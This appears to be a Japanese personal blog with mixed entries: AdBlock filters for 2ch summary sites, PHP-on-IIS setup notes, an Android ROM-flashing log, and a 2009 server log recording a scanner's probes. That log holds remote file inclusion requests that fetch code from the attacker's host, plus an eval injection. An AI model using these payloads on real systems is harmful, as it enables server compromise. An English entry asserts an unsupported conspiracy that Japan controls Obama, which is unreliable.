2chまとめサイトを見ないようにするいい方法ない?

ホッテントリの一覧から消したり、Google検索結果から消したりしたいんだけど。

今はAdblockPlusで自作フィルタまとめサイトURLをちまちま追加してるんだけど、どうもめんどくさい。

なんか、Firefoxでいいアドオンとかない?

↓現状の自作フィルタ

##a[href*=".2ch.net%2F"]
##a[href*=".2ch.net/"]
##a[href*="0p0td.blog.fc2.com"]
##a[href*="0taku.livedoor.biz"]
##a[href*="18game.gekiyasu.co.uk"]
##a[href*="2012spark.blog.fc2.com"]
##a[href*="21cmusic.blog.fc2.com"]
##a[href*="24vice.biz"]
##a[href*="25chu.com"]
##a[href*="25sokunews.blog.fc2.com"]
##a[href*="2ch-bike.net"]
##a[href*="2ch-c.net"]
##a[href*="2ch-gamekouryaku.doorblog.jp"]
##a[href*="2ch-gsn.com"]
##a[href*="2ch-matome-shumiblog.seesaa.net"]
##a[href*="2ch-shiryokukaifuku.seesaa.net"]
##a[href*="2ch.ki9.biz"]
##a[href*="2chan.ldblog.jp"]
##a[href*="2channelmatomenews.blog.fc2.com"]
##a[href*="2chbbs.blog136.fc2.com"]
##a[href*="2chbiyori.livedoor.biz"]
##a[href*="2chbooknews.blog114.fc2.com"]
##a[href*="2chcancoffee.blog.fc2.com"]
##a[href*="2chcopipe.com"]
##a[href*="2chdoramania.seesaa.net"]
##a[href*="2chexplorer.blog.shinobi.jp"]
##a[href*="2chhimanekosokuhou.blog.fc2.com"]
##a[href*="2chkaden.blog.fc2.com"]
##a[href*="2chkeiba2chkeiba.blog.fc2.com"]
##a[href*="2chkowaihanashi.doorblog.jp"]
##a[href*="2chmatome-ex.livedoor.biz"]
##a[href*="2chmatome53.blog.fc2.com"]
##a[href*="2chmatomefc.blog.fc2.com"]
##a[href*="2chmatomeyaruo.blog134.fc2.com"]
##a[href*="2chmomokuro.seesaa.net"]
##a[href*="2chndkd.blomaga.jp"]
##a[href*="2chnews-s.doorblog.jp"]
##a[href*="2chnewsmatome.doorblog.jp"]
##a[href*="2chnokakera.blog.fc2.com"]
##a[href*="2chnpb.blog.fc2.com"]
##a[href*="2chokaita.blog97.fc2.com"]
##a[href*="2chpokepoke.blog.fc2.com"]
##a[href*="2chrennai.seesaa.net"]
##a[href*="2chsoccerballgame.seesaa.net"]
##a[href*="2chsoccernews.blog.fc2.com"]
##a[href*="2chtekisakasoku.doorblog.jp"]
##a[href*="2chtestblog.seesaa.net"]
##a[href*="2chwomen.doorblog.jp"]
##a[href*="2chwork.seesaa.net"]
##a[href*="2cniroiro.blog.fc2.com"]
##a[href*="2critical.blog.fc2.com"]
##a[href*="2dimension.blog59.fc2.com"]
##a[href*="2gigenchan.blog.fc2.com"]
##a[href*="2halfdshow.blog75.fc2.com"]
##a[href*="2isanpo.blog.fc2.com"]
##a[href*="2logch.com"]
##a[href*="2logch.livedoor.biz"]
##a[href*="2r.ldblog.jp"]
##a[href*="2rnevip.blog102.fc2.com"]
##a[href*="2rp.ldblog.jp"]
##a[href*="2shkane.seesaa.net"]
##a[href*="2syokan.blog.shinobi.jp"]
##a[href*="2tunes.livedoor.biz"]
##a[href*="2ya.sblo.jp"]
##a[href*="33804941.at.webry.info"]
##a[href*="3939nyusu.blog69.fc2.com"]
##a[href*="3f-games.com"]
##a[href*="456p.doorblog.jp"]
##a[href*="47254725.blog60.fc2.com"]
##a[href*="48gcom.doorblog.jp"]
##a[href*="48matome.jp"]
##a[href*="4vipstars.blog.fc2.com"]
##a[href*="4wd555.blog.fc2.com"]
##a[href*="55vip555.ldblog.jp"]
##a[href*="68.ldblog.jp"]
##a[href*="777seaside.blog.fc2.com"]
##a[href*="7ch.doorblog.jp"]
##a[href*="7toriaezu.blog.fc2.com"]
##a[href*="91news.blog.fc2.com"]
##a[href*="9sokuvip.com"]
##a[href*="aa2ki.blog108.fc2.com"]
##a[href*="aaieba.livedoor.biz"]
##a[href*="absurd.blogo.jp"]
##a[href*="ace-ch.net"]
##a[href*="afternoongame.blog12.fc2.com"]
##a[href*="agejo.org"]
##a[href*="ai-nyu.com"]
##a[href*="aidorunews.com"]
##a[href*="aimasusokuhou.blog.fc2.com"]
##a[href*="airlinehonpo.blog.fc2.com"]
##a[href*="ajianosirase.ldblog.jp"]
##a[href*="akankore.doorblog.jp"]
##a[href*="akb48.monster-speed.com"]
##a[href*="akb48aklog.ldblog.jp"]
##a[href*="akb48blog1.blog.fc2.com"]
##a[href*="akb48gazoublog.seesaa.net"]
##a[href*="akb48matome.com"]
##a[href*="akb48nensensou.net"]
##a[href*="akb48sokuhou.doorblog.jp"]
##a[href*="akb48sugao.doorblog.jp"]
##a[href*="akb48taimuzu.livedoor.biz"]
##a[href*="akb48topic.com"]
##a[href*="akb48turn.doorblog.jp"]
##a[href*="akbeight.seesaa.net"]
##a[href*="akbmato.doorblog.jp"]
##a[href*="akbmtm48.ldblog.jp"]
##a[href*="alfalfalfa.com"]
##a[href*="alien701.blog117.fc2.com"]
##a[href*="all-a.org"]
##a[href*="alsoku.blog47.fc2.com"]
##a[href*="ameblo.jp/dondon-iy"]
##a[href*="ameblo.jp/kite-leila"]
##a[href*="ameblo.jp/nico-soku"]
##a[href*="amenochi-hare.doorblog.jp"]
##a[href*="amesoku.ldblog.jp"]
##a[href*="amplitude.blog83.fc2.com"]
##a[href*="androidken.blog119.fc2.com"]
##a[href*="anibachi.blog.fc2.com"]
##a[href*="anibiyo.blog.fc2.com"]
##a[href*="anicap.net"]
##a[href*="anigaman.blog.fc2.com"]
##a[href*="anige-sokuhou.ldblog.jp"]
##a[href*="aniken.doorblog.jp"]
##a[href*="animalch.net"]
##a[href*="animan.doorblog.jp"]
##a[href*="animangaro.livedoor.biz"]
##a[href*="animarusokuho.com"]
##a[href*="animarusokuho.doorblog.jp"]
##a[href*="animatosoku.blog.fc2.com"]
##a[href*="animekun.seesaa.net"]
##a[href*="animeltdown.blog137.fc2.com"]
##a[href*="animematome.net"]
##a[href*="animeotanews.blog.fc2.com"]
##a[href*="anisoku.info"]
##a[href*="ankomochi.cc"]
##a[href*="anomalysokuhou3.doorblog.jp"]
##a[href*="ansokuwww.blog50.fc2.com"]
##a[href*="apasoku.doorblog.jp"]
##a[href*="apple-info.ldblog.jp"]
##a[href*="apricotcomplex.net"]
##a[href*="aqua2ch.net"]
##a[href*="aqualog.doorblog.jp"]
##a[href*="aquaturtlium.jugem.jp"]
##a[href*="aramame.doorblog.jp"]
##a[href*="arasoku.ldblog.jp"]
##a[href*="archdesign.blog.jp"]
##a[href*="aresoku.blog42.fc2.com"]
##a[href*="arigachimatome.blog.fc2.com"]
##a[href*="aromablack5310.blog77.fc2.com"]
##a[href*="arukugamu.blog70.fc2.com"]
##a[href*="asdnews.blog.fc2.com"]
##a[href*="asianews2ch.livedoor.biz"]
##a[href*="asiareaction.blog.fc2.com"]
##a[href*="asiari.blog.fc2.com"]
##a[href*="asitagamienai.blog118.fc2.com"]
##a[href*="asnyaro.blog129.fc2.com"]
##a[href*="atasino.com"]
##a[href*="atoaziwarui.blog.fc2.com"]
##a[href*="atolog69.com"]
##a[href*="audiokun.blog.fc2.com"]
##a[href*="ayacnews2nd.com"]
##a[href*="ayamevip.com"]
##a[href*="ayutube.blog.fc2.com"]
##a[href*="azz237.blog89.fc2.com"]
##a[href*="b.hatena.ne.jp"]
##a[href*="b.sutesoku.org"]
##a[href*="badassvid.com"]
##a[href*="baiku-sokuho.info"]
##a[href*="bakenseach.blog.fc2.com"]
##a[href*="bakufu.jp"]
##a[href*="bakusoku.biz"]
##a[href*="balancernews.blog14.fc2.com"]
##a[href*="baraethi-matome.com"]
##a[href*="barukanlog.blog31.fc2.com"]
##a[href*="baseball-mag.net"]
##a[href*="beelzeboulxxx.com"]
##a[href*="beesoku.doorblog.jp"]
##a[href*="beesuke.doorblog.jp"]
##a[href*="beginnerch.blog103.fc2.com"]
##a[href*="benrikosodate.blog.fc2.com"]
##a[href*="bestgram.net"]
##a[href*="bibisoku.doorblog.jp"]
##a[href*="bigannavi.doorblog.jp"]
##a[href*="bigbigbigcat.blog.fc2.com"]
##a[href*="bigotwolf.blogspot.jp"]
##a[href*="bihada2ch.seesaa.net"]
##a[href*="bikeyarou2ch.blog.fc2.com"]
##a[href*="bipblog.com"]
##a[href*="birogu2ch.ldblog.jp"]
##a[href*="bisyoujo23.ldblog.jp"]
##a[href*="biyoumatome.doorblog.jp"]
##a[href*="blackandwhite000.blog59.fc2.com"]
##a[href*="blackcatnews.blog.fc2.com"]
##a[href*="bloblog688.blog.fc2.com"]
##a[href*="blog-bh.seesaa.net"]
##a[href*="blog-news.doorblog.jp"]
##a[href*="blog.esuteru.com"]
##a[href*="blog.geinou-now.com"]
##a[href*="blog.harugon.com"]
##a[href*="blog.livedoor.jp%2Fakbip"]
##a[href*="blog.livedoor.jp%2Faoba_f"]
##a[href*="blog.livedoor.jp%2Fbbyakyu"]
##a[href*="blog.livedoor.jp%2Fbluejay01-review"]
##a[href*="blog.livedoor.jp%2Fbmaysu"]
##a[href*="blog.livedoor.jp%2Fcarpmatome"]
##a[href*="blog.livedoor.jp%2Fcatcherliner"]
##a[href*="blog.livedoor.jp%2Fchihhylove"]
##a[href*="blog.livedoor.jp%2Fchristmas1224"]
##a[href*="blog.livedoor.jp%2Fdanji4223"]
##a[href*="blog.livedoor.jp%2Fdarkm"]
##a[href*="blog.livedoor.jp%2Fdiet2channel"]
##a[href*="blog.livedoor.jp%2Fdomesoccer"]
##a[href*="blog.livedoor.jp%2Fdouganews24"]
##a[href*="blog.livedoor.jp%2Fdoujincafe"]
##a[href*="blog.livedoor.jp%2Fdqnplus"]
##a[href*="blog.livedoor.jp%2Ferokunai"]
##a[href*="blog.livedoor.jp%2Ffightersmatome"]
##a[href*="blog.livedoor.jp%2Fg_ogasawara"]
##a[href*="blog.livedoor.jp%2Fgachagacha123"]
##a[href*="blog.livedoor.jp%2Fgatun02"]
##a[href*="blog.livedoor.jp%2Fgeek"]
##a[href*="blog.livedoor.jp%2Fgoldennews"]
##a[href*="blog.livedoor.jp%2Fgundam_matome"]
##a[href*="blog.livedoor.jp%2Fguusoku"]
##a[href*="blog.livedoor.jp%2Fhawksmatome"]
##a[href*="blog.livedoor.jp%2Fhorsenews_orz"]
##a[href*="blog.livedoor.jp%2Fi6469"]
##a[href*="blog.livedoor.jp%2Fikesanfromfr"]
##a[href*="blog.livedoor.jp%2Finsidears"]
##a[href*="blog.livedoor.jp%2Fitsoku"]
##a[href*="blog.livedoor.jp%2Fkaikaihanno"]
##a[href*="blog.livedoor.jp%2Fkamisokuhou"]
##a[href*="blog.livedoor.jp%2Fkanasokucomic"]
##a[href*="blog.livedoor.jp%2Fkankore200"]
##a[href*="blog.livedoor.jp%2Fkekkawww"]
##a[href*="blog.livedoor.jp%2Fkinisoku"]
##a[href*="blog.livedoor.jp%2Fkuru2vip"]
##a[href*="blog.livedoor.jp%2Fladymatome"]
##a[href*="blog.livedoor.jp%2Flivejupiter2"]
##a[href*="blog.livedoor.jp%2Flove120331"]
##a[href*="blog.livedoor.jp%2Flunasoku"]
##a[href*="blog.livedoor.jp%2Fmatome_2ch_"]
##a[href*="blog.livedoor.jp%2Fmuchio68"]
##a[href*="blog.livedoor.jp%2Fnandemojouhou"]
##a[href*="blog.livedoor.jp%2Fnanj2ch"]
##a[href*="blog.livedoor.jp%2Fnanj_bom"]
##a[href*="blog.livedoor.jp%2Fnanjkuji"]
##a[href*="blog.livedoor.jp%2Fnanjmagnus"]
##a[href*="blog.livedoor.jp%2Fnanjnan"]
##a[href*="blog.livedoor.jp%2Fnanjstu"]
##a[href*="blog.livedoor.jp%2Fnemusoku"]
##a[href*="blog.livedoor.jp%2Fnews23vip"]
##a[href*="blog.livedoor.jp%2Fnichmatomerunn"]
##a[href*="blog.livedoor.jp%2Fnico3q3q"]
##a[href*="blog.livedoor.jp%2Fnicovip2ch"]
##a[href*="blog.livedoor.jp%2Fnonvip"]
##a[href*="blog.livedoor.jp%2Fnwknews"]
##a[href*="blog.livedoor.jp%2Fnyusokudeyaruo"]
##a[href*="blog.livedoor.jp%2Fparthenon_k"]
##a[href*="blog.livedoor.jp%2Frbkyn844"]
##a[href*="blog.livedoor.jp%2Fredcomet2ch"]
##a[href*="blog.livedoor.jp%2Frinjinyabai"]
##a[href*="blog.livedoor.jp%2Frobosoku"]
##a[href*="blog.livedoor.jp%2Frock1963roll"]
##a[href*="blog.livedoor.jp%2Fronsoku2"]
##a[href*="blog.livedoor.jp%2Fseiyufan"]
##a[href*="blog.livedoor.jp%2Fsoccerkusoyarou"]
##a[href*="blog.livedoor.jp%2Fuwasainfo"]
##a[href*="blog.livedoor.jp%2Fwarota_a_lot"]
##a[href*="blog.livedoor.jp%2Fyakiusoku"]
##a[href*="blog.livedoor.jp%2Fyarusoku"]
##a[href*="blog.livedoor.jp%2Fzetusoku"]
##a[href*="blog.livedoor.jp/a011065"]
##a[href*="blog.livedoor.jp/a6news"]
##a[href*="blog.livedoor.jp/aamatome"]
##a[href*="blog.livedoor.jp/aatyu"]
##a[href*="blog.livedoor.jp/ab119902232"]
##a[href*="blog.livedoor.jp/acezeon"]
##a[href*="blog.livedoor.jp/aho_nan"]
##a[href*="blog.livedoor.jp/aircraftchannel"]
##a[href*="blog.livedoor.jp/akb48_nmb48matome"]
##a[href*="blog.livedoor.jp/akb48images"]
##a[href*="blog.livedoor.jp/akb48love_akb"]
##a[href*="blog.livedoor.jp/akb48matomeboshi"]
##a[href*="blog.livedoor.jp/akb48summary"]
##a[href*="blog.livedoor.jp/akb83"]
##a[href*="blog.livedoor.jp/akbholic"]
##a[href*="blog.livedoor.jp/akbip"]
##a[href*="blog.livedoor.jp/akiaki225"]
##a[href*="blog.livedoor.jp/akibahd"]
##a[href*="blog.livedoor.jp/akubiiii48"]
##a[href*="blog.livedoor.jp/amesoku2013"]
##a[href*="blog.livedoor.jp/ametyansokuhou"]
##a[href*="blog.livedoor.jp/anamatome"]
##a[href*="blog.livedoor.jp/anigam"]
##a[href*="blog.livedoor.jp/anikiti1"]
##a[href*="blog.livedoor.jp/animarusokuho"]
##a[href*="blog.livedoor.jp/anime1990"]
##a[href*="blog.livedoor.jp/anime_ch2"]
##a[href*="blog.livedoor.jp/aoba_f"]
##a[href*="blog.livedoor.jp/arkanimeraid"]

入りきらないので以下略

2011-08-19

Windows Server 2008 R2 + PHP 5 (FastCGI版)

Windows Server 2008 R2 に SP1をあてて

今日リリースされたばかりっぽい IIS7.5 に PHP 5.3.7 (Non Thread Safe版) をインストール

さらにSQLServer 2008 R2 Express接続

http://blogs.msdn.com/b/osamum/archive/2010/09/27/php-ms-sql-server.aspx

http://network.station.ez-net.jp/server/microsoft/windows/2008/iis7_php.asp

http://keicode.com/cgi/how-to-connect-to-mssql.php

http://www.microsoft.com/download/en/details.aspx?id=20098

phpinfo() 表示までは割りとすんなりと。

PHP 5.3以降は、php.ini の date.timezone 設定がほぼ必須なようなので注意かな。

その先、内部エラー(500)でつまずく。

内部エラーになった原因は sqlsrv_connect と書くべきを sqlserv_connect と書いてしまっていたから。

で、display_errors を On にしたり、error_log に ファイルを指定しているにもかかわらず、画面は500。

イベントログにはエラーも警告もなし。原因がわからんじゃないか...

とりあえず

error_log = c:\....log をやめて error_log = syslog にして、一応画面にエラー内容が出てくるようになった。

2010-07-10

HT-03A froyo

dwang厨が無謀にもfroyoを入れてみる記録のページ。

名前リンクされると嫌なのでここに書いてみる。

結局CM6-RC1+yay-gapps で落着きそうな雰囲気。

まとめ (20100711 18:30 完了)

メモ
  • voldn + poweron → fastboot
  • home + poweron → recoverymode
初期状態

dwang-1.17.1

手順

eMonster用に使ってた sandisk 2GB (メモ)

確認されているROM

7/9 にリリースされているもの

  • defcon CM6 FroYo (Test9)
  • CM6-DS-Nightly (0709)
  • SPF Connection (2.7)

ext partition 要対応? とおもったら仏語じゃねーか

Wifi NG

  • Xtreme Froyo v1.9.5

@kenmood

Wifi OK

  • http://androidspin.com/2010/07/06/rom-kenmood-e-xtreme-froyo-v1-9-4-with-working-wifi-camera-bluetooth-3dgallery-for-t-mobile-g1mt3g/
1.5に戻す

どっかから落した20090801-docomo-ht-03a.rar のうち、boot, cache, data, system のみをnandroidで復旧してみる。nandroid.md5復元も忘れずに。

Xtreme Froyo v1.9.5 try
  • 日本語fontは後でupdate.zip で入れることとする (autosignとかしらないけど、あとで調べりゃなんとかなんだろ)
  • SPL 1.33.2005 ← 入ってた。
  • Latest Radio highly recommended (どうしたものか → だめなら後で考える)

手順

  1. done: ROM落せ http://tinyurl.com/extreme-froyo-1-9-5
  2. nope: (ステップ番号予約)
  3. done: black theme 落せ http://tinyurl.com/froyo-blacktheme-v2
  4. done: sdにコピれ
  5. done: full wipe
  6. done: flash rom → ついでに root.zip (以下参照) もここで焼いてしまう。suが入ってるだけだし。
  7. skip: flash a2sd + cc patch → 2ch "root13":770 によると既に適用済みらしい
  8. skip: flash froyo blacktheme → blackは面倒そうなのでやめる
  9. reboot → すげー時間かかるんですけど、ダメか。
以後実行せず
  1. ADWの設定をこうしろ → どうでもいいがな
  2. sparepartsの設定をこうしろ (launcher in memory)
  3. show clockとかいろいろ (blacktheme場合は時刻の色)
  4. notification colorの設定 (black theme場合)
  5. google mapをmarketからdownload
  6. reboot
  7. 警告: 他のkernelとかgappsをinstallすることのないように → kernelはまだしも、gappsはなんでだろ
  8. and ENJOY!

追加手順:

  1. root permissionの修正はこれを焼く: http://www.mrcellphoneunlocker.com/android/root.zip
メモ
  • rebootに必要なのは「信じる心」?
  • boot animation が重くなったり止まったりするのは何故なんだぜ
  • 最終的に、boot できずあきらめてみる。
他のromを試す
  • CM5.0.8 (Eclair) → ok (ちゃんと焼けるか念のためテストした)
  • SPF Connection 2.8 → bootはするけどfontが豆腐、あと突然死

http://www.androidinforum.fr/htc-dream-android/froyo-french-connection-100-t1742.html#p6156

partition: swap 160M, ext 500M, 残り vfat がおすすめとな。

何度か丹念に「目標をwipeしてreboot」を繰り返してたら安定した気がする。

豆腐をfont入れ、localeをlibicudata.so の入れ替えで対処 (できるかなreboot中)

→ libicudata.so は入れかえちゃダメ。起動しなくなる。recoveryで起動して/systemをマウントしてことなきを得る。

SPF Connection 2.8

2010-07-11 追記

2chでも報告されているとおり、wlanが使えない。あと細かい話だけど、live wallpaperが使えない気がする。メモリが足りないだけかもしれないけど。

marketが死にまくる (acoreが死ぬ)。ほかにも死にまくるけど、何故かはよくわからない。とりあえず体験はできるけど、まだ常用には至らないかも。

(安定している、と言っている人もいる)

SPF Connection 2.8.1

2010-07-11 追記

zip落してきて上書きinstallしてみた。なんか日本語fontが消されたんだけど(ぶー!)

ちなみに日本語fontはM+を利用してます。

時間つかった限りでは、他人にお勧めできるほどじゃないけど何とか使いものになるかも。dwang環境はnandroidでしかバックアップしていないので、手作業でアプリなどは手作業で復帰する予定。

CM6-RC1

(2010-07-11 午後5時追記)

どうもSPF Connectionが安定しないのと、ベースがCM6ということで、まずはベースに近いほうが良いだろうと

CM6-RC1を焼いてみる(この項続く)

http://www.cyanogenmod.com/home/cyanogenmod-6-0-0-rc1

Marketが極めて不安定な模様。エラー

E/AndroidRuntime( 2000): FATAL EXCEPTION: UpdateCheckinDatabaseService

E/AndroidRuntime( 2000): java.lang.SecurityException: Permission Denial: writing com.google.android.gsf.settings.GoogleSettingsProvider uri content://com.google.settings/partner from pid=2000, uid=10036 requires com.google.android.providers.settings.permission.WRITE_GSETTINGS

すぐ直りそうではあるけど。

Market落ち対策:
  • yay-gapps を普通のgappsの上から焼いた時はMarket落ち頻発

(エラー内容から察するに、installされたapkの記録をgoogle accountに書き込めない)

  • まっさらの1.5からCM6-RC1, yay-gapps を焼いた状態ではMarket落ち発生せず

c.f. http://forum.xda-developers.com/showpost.php?p=7139560&postcount=109

2010-06-24

Obama is controlled by Japan Goverment?

Possibly, my following story surprise you.

However, we, Japanese have a duty toward world people(included future generation)that tell the truth.


In 1998, when Obama was still just a lawyer, he came to Japan.

Then, Obama dealt with a lawsuit that was involved in Ford employer and Honda employer.

The content of this affair is following; in 1995, Ford employer stole the confidential report of Honda

(http:/nikkei.com/article=19951001_23), and this affair was disclosed by Japanese Police and Japanese Monopoly Commission.


This affair is responsible to Ford. And Honda was the victim.

But, in 1997 Obama was asked by Ford as their company lawyer. Then, Obama didn't know the true.

In this time, Obama was regarded as one of the best lawyer and Candidate. So he couldn't miss this lawsuit.

However, he had gradually understood his position and revealed his failure that undertook this lawsuit.


If this lawsuit occurred, Obama maybe didn't become Candidate and President of U.S.A.

But, the lawsuit didn't occur.In 1998, in Tokyo, Obama met some Japanese politicians, some Honda's boards.

Instead of giving up this lawsuit, they require Obama to accept a condition:

"If U.S.A government try to oust Japanese auto company, Obama and Ford should rescue Honda".

And Honda have been devoting a lot of money to Obama.


You must rethink 2009's situation.

Who is winner?

In 2009, when GM's problem occured, when Toyota's problem occured, who did get this benefit?



Some people maybe think this story is nonsense. Rethink.

2009-12-07

株式会社プロアームからのスキャン活動(Morfeus Fucking Scanner)

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /?_SERVER[DOCUMENT_ROOT]=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 234 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /errors.php?error=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 223 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /?page=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 216 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /poll/png.php?include_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 231 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 272 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /admin/business_inc/saveserver.php?thisdir=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 242 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /webcalendar/tools/send_reminders.php?noSet=0&includedir=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 256 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /cal/tools/send_reminders.php?noSet=0&includedir=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 251 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /projects/includes/db_adodb.php?baseDir=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 241 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 242 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 286 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET //?mosConfig_absolute_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 231 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 237 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /project/includes/db_adodb.php?baseDir=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 240 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /board/include/bbs.lib.inc.php?site_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 240 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /dotproject/includes/db_adodb.php?baseDir=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 242 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 247 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /calendar/tools/send_reminders.php?noSet=0&includedir=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 253 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /include/bbs.lib.inc.php?site_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 236 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /rgboard/include/bbs.lib.inc.php?site_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 242 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 259 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 255 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 269 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 260 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 259 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /?include_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 224 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /cacti/include/config_settings.php?config[include_path]=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 248 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /cms/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 245 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 307 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /index.php?DOCUMENT_ROOT=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 232 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 259 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:47 +0900] "GET /plugins/safehtml/HTMLSax3.php?dir[plugins]=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 240 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:47 +0900] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 272 "-" "Morfeus Fucking Scanner"

ログイン ユーザー登録
ようこそ ゲスト さん